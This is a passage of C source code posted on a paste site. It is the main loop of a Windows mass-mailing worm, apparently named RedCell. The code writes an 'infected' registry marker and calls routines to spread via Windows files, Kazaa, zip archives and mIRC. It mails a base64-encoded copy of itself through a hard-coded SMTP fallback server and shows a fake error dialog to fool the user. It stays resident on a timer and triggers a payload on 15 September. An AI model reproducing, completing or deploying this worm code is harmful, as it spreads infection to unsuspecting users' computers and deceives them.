  823. {
  824. RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\RedCell",&hKey);
  825. //Create a key in the registry to mark the PC as infected
  826. RegSetValueEx(hKey,"infected",0,REG_SZ,inf,sizeof(inf));
  827. RegCloseKey(hKey);
  828. //----INFECT COMPUTER----
  829. infectwin(filename);
  830. kazaa(filename);
  831. zipit(winbkup);
  832. mirc();
  833. base64(filename);
  834. conect();
  835. first=1;
  836. MessageBox(hwnd,"This program has performed an illegal operation","Error",MB_OK+MB_ICONSTOP);
  837. }
  838. base64(filename);
  839. GetSystemTime(&time);
  840. if (time.wDay==15 && time.wMonth==9) payload(); //Activate payload when school starts (15 sept. in Romania)
  841. if (first==0) {
  842.     base64(filename); //Write a "base64" encoded file every time (just in case)
  843.     conect(); //Try to connect
  844.     if (err!=0) { //If the server found in the reg. got an error, try using the hard-coded serv.
  845.         strcpy(server,"smtp.barrysworld.com");
  846.         strcpy(email,"john@barrysworld.com");
  847.         strcpy(helo,"barrysworld.com");
  848.         conect();
  849.         }
  850. }
  851. if (connected==0) SetTimer(hwnd,tim,50000,TimerProc); //Go resident and check for a connection every 50 secs.
  852.  
  853. while(GetMessage(&msg,NULL,0,0)) { //Stuff... ;-)
  854.     TranslateMessage(&msg);
  855.     DispatchMessage(&msg);
  856. }
  857. return msg.wParam;
  858. //end of main()
  859. }
  860.  
  861. //--------------------------------------WNDPROC----------------------------------------------
  862.  
  863. LRESULT CALLBACK WndProc(HWND hwnd,UINT iMsg,WPARAM wParam,LPARAM lParam) {
  864.     HDC hdc;
  865.     PAINTSTRUCT ps;
  866.  
  867.     switch(iMsg){
  868.     case WM_PAINT:
  869.         hdc = BeginPaint(hwnd,&ps);
  870.         EndPaint(hwnd,&ps);
  871.         return 0;
  872.     case WM_DESTROY:
  873.         PostQuitMessage(0);
  874.         return 0;
  875.     }
  876.     return DefWindowProc(hwnd,iMsg,wParam,lParam);
  877. }
  878. //That's all folks! e-mail to: MI_pirat@yahoo.com , web:
Add Comment
Please, Sign In to add comment